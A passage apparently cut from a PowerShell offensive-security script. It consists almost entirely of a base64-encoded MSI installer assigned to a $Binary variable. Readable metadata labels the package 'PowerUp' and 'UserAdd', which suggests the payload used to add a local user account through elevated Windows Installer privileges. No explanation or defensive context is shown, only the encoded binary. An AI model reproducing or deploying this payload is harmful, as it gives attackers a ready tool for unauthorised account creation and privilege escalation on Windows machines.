RFQ1RFRDtXSVhfVVBHUkFERV9ERVRFQ1RFRFNPRlRXQVJFXFtCWi5DT01QQU5ZTkFNRV1cTVNJIFdyYXBwZXJcSW5zdGFsbGVkXFtCWi5XUkFQUEVEX0FQUElEXUxvZ29uVXNlcltMb2dv" + $Binary = '0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgAEAP7/DAAGAAAAAAAAAAEAAAABAAAAAQAAAAAAAAAAEAAAAgAAAAEAAAD+////AAAAAAAAAAD///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP3////+/////v///y8AAAAFAAAABgAAAP7///8IAAAACQAAAAoAAAALAAAADAAAAA0AAAAOAAAADwAAABAAAAARAAAAEgAAABMAAAAUAAAAFQAAACwAAAAYAAAAFgAAABkAAAAaAAAAGwAAABwAAAAdAAAAHgAAAB8AAAAgAAAAIQAAACIAAAAjAAAAJAAAACUAAAAmAAAAJwAAACgAAAApAAAAKgAAACsAAAD+////LQAAAC4AAAAwAAAA/v///zEAAAD+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////9SAG8AbwB0ACAARQBuAHQAcgB5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFgAFAP//////////AgAAAIQQDAAAAAAAwAAAAAAAAEYAAAAAAAAAAAAAAABQSJaT62LPAQMAAABAFwAAAAAAAAUAUwB1AG0AbQBhAHIAeQBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAIBEAAAABkAAAD/////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANgBAAAAAAAAQEj/P+RD7EHkRaxEMUgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAgEVAAAAAwAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJAAAAEAgAAAAAAABASMpBMEOxOztCJkY3QhxCNEZoRCZCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAACAQQAAAABAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACoAAAAwAAAAAAAAAEBIykEwQ7E/Ej8oRThCsUEoSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAIBEgAAAA0AAAD/////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKwAAABgAAAAAAAAAQEjKQflFzkaoQfhFKD8oRThCsUEoSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgAAgH///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAAAAKgAAAAAAAABASAtDMUE1RwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAP///////////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP///////////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAIAAAADAAAABAAAAAUAAAAGAAAABwAAAP7/////////CgAAAAsAAAAMAAAADQAAAA4AAAAPAAAAEAAAABEAAAASAAAAEwAAABQAAAAVAAAAFgAAABcAAAAYAAAAGQAAABoAAAAbAAAAHAAAAB0AAAAeAAAAHwAAACAAAAAhAAAAIgAAACMAAAAkAAAAJQAAACYAAAAnAAAAKAAAACkAAAD+/////v////7////+////MwAAAP7////+/////v////7////+////OgAAADUAAAA2AAAA/v////7////+/////v///zsAAAA9AAAA/v///z4AAAA/AAAAQAAAAEEAAABCAAAAQwAAAEQAAABFAAAARgAAAEcAAABIAAAASQAAAEoAAAD+////TAAAAE0AAABOAAAATwAAAFAAAABRAAAAUgAAAFMAAABUAAAAVQAAAP7////+////WAAAAP7////+/////v///1wAAAD+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////7/AAAGAQIAAAAAAAAAAAAAAAAAAAAAAAEAAADghZ/y+U9oEKuRCAArJ7PZMAAAAKgBAAAOAAAAAQAAAHgAAAACAAAAkAEAAAMAAACAAQAABAAAAHABAAAFAAAAgAAAAAYAAAAoAQAABwAAAJQAAAAJAAAAqAAAAAwAAADYAAAADQAAAOQAAAAOAAAA8AAAAA8AAAD4AAAAEgAAAAgBAAATAAAAAAEAAAIAAADkBAAAHgAAAAoAAABJbnN0YWxsZXIAAAAeAAAACwAAAEludGVsOzEwMzMAAB4AAAAnAAAAe0EwNDlFMzFGLTc3MDEtNEM0QS1BQ0JDLUIyNjBFQjA4QkI0Q30AAEAAAAAALfR1QTjPAUAAAAAALfR1QTjPAQMAAADIAAAAAwAAAAIAAAADAAAAAgAAAB4AAAAXAAAATVNJIFdyYXBwZXIgKDQuMS41NC4wKQAAHgAAAEAAAABJbnN0YWxsZXIgd3JhcHBlZCBieSBNU0kgV3JhcHBlciAoNC4xLjU0LjApIGZyb20gd3d3LmV4ZW1zaS5jb20AHgAAAAgAAABQb3dlclVwAB4AAAAIAAAAVXNlckFkZAAeAAAAEAAAAFVzZXJBZGQgMS4wLjAuMABBOM8BAwAAAMgAAAADAAAAAgAAAB4AAAArAAAAV2luZG93cyBJbnN0YWxsZXIgWE1MIFRvb2xzZXQgKDMuOC4xMTI4LjApAAADAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYABgAGAAYABgAGAAYABgAGAAYACgAKACIAIgAiACkAKQApACoAKgAqACsAKwAvAC8ALwAvAC8ALwA1ADUANQA9AD0APQA9AD0ATQBNAE0ATQBNAE0ATQBNAFwAXABhAGEAYQBhAGEAYQBhAGEAbwBvAHIAcgByAHMAcwBzAHQAdAB3AHcAdwB3AHcAdwCCAIIAhgCGAIYAhgCGAIYAkACQAJAAkACQAJAAkAACAAUACwAMAA0ADgAPABAAEQASAAcACQAjACUAJwAjACUAJwAjACUAJwABAC0AJQAvADEANAA3ADoANQBJAEsABAAjAEAAQwBGAAsANAA3AE0ATwBRAFQAVgBdAF8AJwA3AF8AYQBkAGcAaQBrAAEALQAjACUAJwAjACUAJwALACUAQAB4AHoAfAB+AIAABwCCAAEABwBfAIYAiACKADcAawCRAJMAlQCZAJsACAAIABgAGAAYABgAGAAIABgAGAAIAAgACAAYABgACAAYABgACAAYABgACAAIABgACAAYAAgACAAYAAgAGAAIAAgACAAYABgAGAAYABgACAAIABgAGAAYAAgACAAIAAgAGAAIAAgACAAIABgAGAAIAAgACAAYABgACAAYABgACAAIABgACAAIABgAGAAYAAgACAAYABgACAAIAAgACAAIABgACAAYABgAGAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAgAEAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA/P//fwAAAAAAAAAA/P//fwAAAAAAAAAA/P//fwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA